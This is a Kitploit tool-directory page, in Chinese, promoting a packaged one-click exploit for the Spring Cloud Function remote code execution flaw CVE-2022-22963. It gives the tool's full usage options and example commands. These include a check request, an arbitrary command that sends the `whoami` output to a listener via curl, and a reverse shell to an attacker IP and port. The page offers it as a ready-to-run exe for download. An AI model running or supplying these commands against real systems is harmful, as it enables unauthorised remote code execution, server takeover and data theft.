Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-22963 — spring cloud function 一键利用工具!作者:charis,博客:https://charis3306.top/ | Kitploit
工具/GitHubGitHub/charis3306/cve-2022-22963
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubcharis3306/cve-2022-22963

CVE-2022-22963

spring cloud function 一键利用工具!作者:charis,博客:https://charis3306.top/

查看仓库
813年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-22963 (spring cloud function sple rce)

spring cloud function 一键利用工具! by charis

博客https://charis3306.top/

已打包为exe文件开箱即用

命令主题

root@kitploit:~
usage: Spring-cloud-function-spel0.2.exe [-h] --check CHECK [--route ROUTE] --url URL [--ip IP] [--port PORT] [--proxies PROXIES] [--cmd CMD]

spring cloud function 一键利用工具! by charis 博客https://charis3306.top/

options:
  -h, --help         show this help message and exit
  --check CHECK      检测方式post或get方式,--check get --check post
  --route ROUTE      检测路由,默认是functionRouter
  --url URL          输入利用的url
  --ip IP            反弹shell地址ip
  --port PORT        反弹shell地址端口
  --proxies PROXIES  启用代理
  --cmd CMD          要执行的命令

--check 是必选项

所用帮助主题

root@kitploit:~
Spring-cloud-function-spel0.2.exe --help

image

默认检测--check 是必须选,--route是漏洞存在的路由。 注意如果不借助dnslog 或sleep 进行探测会存有误报!

root@kitploit:~
Spring-cloud-function-spel0.2.exe --check post --url http://www.charis3306.top

image

执行命令验证是否能利用
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --cmd "curl http://192.168.1.3:8080/`whoami`"

image

反弹shell
root@kitploit:~
Spring-cloud-function-spel.exe --check post --url http://192.168.133.136:8080/ --ip 192.168.1.3 --port 9999

image

如果你觉得还不错请给我一个star

问题反馈lssues 或邮箱联系我[email protected]

下载工具